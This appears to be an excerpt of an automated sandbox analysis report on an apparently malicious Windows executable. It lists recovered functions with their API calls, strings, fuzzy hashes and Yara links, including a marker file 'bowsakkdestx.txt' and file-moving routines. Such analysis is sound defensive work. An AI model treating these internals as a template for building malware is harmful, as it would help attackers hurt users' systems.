Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

invalid string position, xrefs: 00414260
string too long, xrefs: 00414256

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7
C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(00700000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 1059622496-2104205924
Opcode ID: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32(00000030), ref: 0041BA73

Strings

0, xrefs: 0041BA1D
LPCWSTRszWindowClass, xrefs: 0041BA65

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419EB8
_memset.LIBCMT ref: 00419EC9
_memset.LIBCMT ref: 00419EDA

Strings

p2Q, xrefs: 00419EE2

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004C70AB

Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9

_UnwindNestedFrames.LIBCMT ref: 004C70C2
___FrameUnwindToState.LIBCMT ref: 004C70D4
CallCatchBlock.LIBCMT ref: 004C70F8

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015

__calloc_crt.LIBCMT ref: 00425A01

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__lock.LIBCMT ref: 00425A37
___addlocaleref.LIBCMT ref: 00425A43
__lock.LIBCMT ref: 00425A57

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(00700000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 3705855051-0
Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00412806
_malloc.LIBCMT ref: 00412814

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(00700000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 0041281F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 3705855051-0
Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004149F1

Strings

invalid string position, xrefs: 00414C3D
string too long, xrefs: 00414C33

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

invalid string position, xrefs: 00417EDF
string too long, xrefs: 00417EE9

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA

Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277

Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73

Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
TranslateMessage.USER32(?), ref: 0041B4CD
DispatchMessageW.USER32(?), ref: 0041B4D7

Strings

I:\5d2860c89d774.jpg, xrefs: 0041B32F
%username%, xrefs: 0041B283

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

